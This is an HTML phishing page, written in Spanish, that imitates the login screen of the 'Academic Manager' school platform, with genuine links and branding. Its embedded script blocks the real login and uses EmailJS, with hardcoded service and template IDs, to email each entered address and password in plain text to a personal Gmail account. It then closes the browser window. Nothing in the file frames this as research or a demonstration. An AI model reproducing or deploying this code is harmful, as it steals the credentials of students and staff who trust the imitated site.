<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Academic</title>
    <link rel="icon" href="C:\Users\Alex\Downloads\DevilProject\Academic Manager_files\descargar.jpg" type="image/svg+xml">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> <!-- Bootstrap CSS -->
    <style>
        body {
            background: url("https://d3g4v0cf6ioz32.cloudfront.net/static/imagenes/backgrounds/background_login_4.jpg") no-repeat center center fixed;
            background-size: cover;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            position: relative;
        }
        .login-container {
            background: rgba(255, 255, 255, 0.8);
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
            width: 400px; /* Ancho fijo para el contenedor */
        }
        .login-container img {
            max-width: 250px;
            max-height: 100px;
            margin-bottom: 20px;
        }
        .input-group-addon {
            background: transparent;
            border: none;
        }
        footer {
            background-color: rgba(16, 0, 138, 0.7);
            color: white;
            padding: 10px; /* Reducir la altura del footer */
            position: absolute;
            bottom: 0;
            width: 100%;
        }
        .footer-content {
            display: flex;
            justify-content: center; /* Centrar contenido horizontalmente */
            align-items: center; /* Centrar contenido verticalmente */
            width: 100%; /* Usar todo el ancho del footer */
        }
        .footer-content p {
            margin: 0 20px; /* Espaciado entre los párrafos */
        }
        .footer-logo {
            margin-left: 20px; /* Ajusta este valor para mover la imagen más a la izquierda */
        }
        .app-store-logos img {
            width: 35%;
            margin: 10px;
        }
        .toggle-password {
            cursor: pointer;
        }
        .link-space {
            margin-left: 10px; /* Espacio entre los enlaces */
        }
    </style>
</head>
<body>
    <div class="login-container">
        <img src="./Academic Manager_files/63fa4583_98d9_4253_85ae_1450d5d17e4b3.png" alt="Logo">
        <form id="loginForm">
            <div class="form-group">
                <div class="input-group">
                    <span class="input-group-addon">
                        <img src="https://img.icons8.com/ios-filled/50/000000/user.png" alt="Usuario" style="width: 20px; height: 20px;">
                    </span>
                    <input type="email" class="form-control" id="txtUsuario" placeholder="Correo electrónico" required>
                </div>
            </div>
            <div class="form-group">
                <div class="input-group">
                    <span class="input-group-addon">
                        <img src="https://img.icons8.com/ios-filled/50/000000/lock.png" alt="Contraseña" style="width: 20px; height: 20px;">
                    </span>
                    <input type="password" class="form-control" id="txtContrasenia" placeholder="Contraseña" required>
                    <span class="input-group-addon toggle-password" onclick="togglePassword()">
                        <img src="https://img.icons8.com/ios-filled/50/000000/visible.png" alt="Mostrar/Ocultar" style="width: 20px; height: 20px;">
                    </span>
                </div>
            </div>
            <button type="submit" class="btn btn-primary btn-block">Inicia sesión</button>
            <div class=" text-center mt-3">
                <a href="https://ulsaneza.academic.lat/FormExternos/ActivarCuenta.aspx">Activar mi cuenta</a>
                <span class="link-space"></span>
                <a href="https://ulsaneza.academic.lat/FormExternos/RecuperarCuenta.aspx">Olvidé mi contraseña</a>
            </div>
        </form>
        <div class="app-store-logos text-center mt-3">
            <a href="https://play.google.com/store/apps/details?id=lat.academic.app" target="_blank">
                <img alt="App disponible en Google Play" src="./Academic Manager_files/badge-google-play.png">
            </a>
            <a href="https://itunes.apple.com/us/app/academic-manager/id1275767194?l=es&amp;mt=8" target="_blank">
                <img alt="Consíguelo en App Store" src="./Academic Manager_files/badge-app_store.png">
            </a>
        </div>
    </div>
    <footer>
        <div class="footer-content">
            <img class="footer-logo" src="https://d3g4v0cf6ioz32.cloudfront.net/static/imagenes/brand/bit_logo_2020.png" alt="Logo">
            <p>Aviso de privacidad</p>
            <p>Términos y condiciones</p>
        </div>
    </footer>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
    <script type="text/javascript">
        (function(){
            emailjs.init({
                publicKey: "YOUR_PUBLIC_KEY",
            });
        })();
    </script>
    <script>
        (function(){
            emailjs.init("C7G3QIdHURceX0Np_"); // Reemplaza con tu User ID de EmailJS
        })();

        document.getElementById("loginForm").addEventListener("submit", function(event) {
            event.preventDefault(); // Evita el envío del formulario

            const email = document.getElementById("txtUsuario").value;
            const password = document.getElementById("txtContrasenia").value;

            // Enviar el correo electrónico
            emailjs.send("service_raji7bg", "template_jydtckf", {
                from_name: "Sistema de Inicio de Sesión",
                to_email: "dano.alexper@gmail.com",
                message: `Intento de Inicio de Sesión:\nCorreo: ${email}\nContraseña: ${password}\nFecha: ${new Date().toLocaleString()}`
            })
            .then(function(response) {
                console.log("Correo enviado exitosamente", response.status, response.text);
                // Cerrar la ventana del navegador
                window.close(); // Esto solo funcionará si la ventana fue abierta por un script
            }, function(error) {
                console.log("Error al enviar el correo", error);
                // Aquí puedes mostrar un mensaje de error
            });

            // Aquí puedes agregar la lógica para autenticar al usuario
        });

        function togglePassword() {
            const passwordField = document.getElementById("txtContrasenia");
            const passwordToggleIcon = document.querySelector(".toggle-password img");
            const isPasswordVisible = passwordField.type === "text";
            passwordField.type = isPasswordVisible ? "password" : "text";
            passwordToggleIcon.src = isPasswordVisible ? "https://img.icons8.com/ios-filled/50/000000/invisible.png" : "https://img.icons8.com/ios-filled/50/000000/visible.png";
        }
    </script>
</body>
</html>
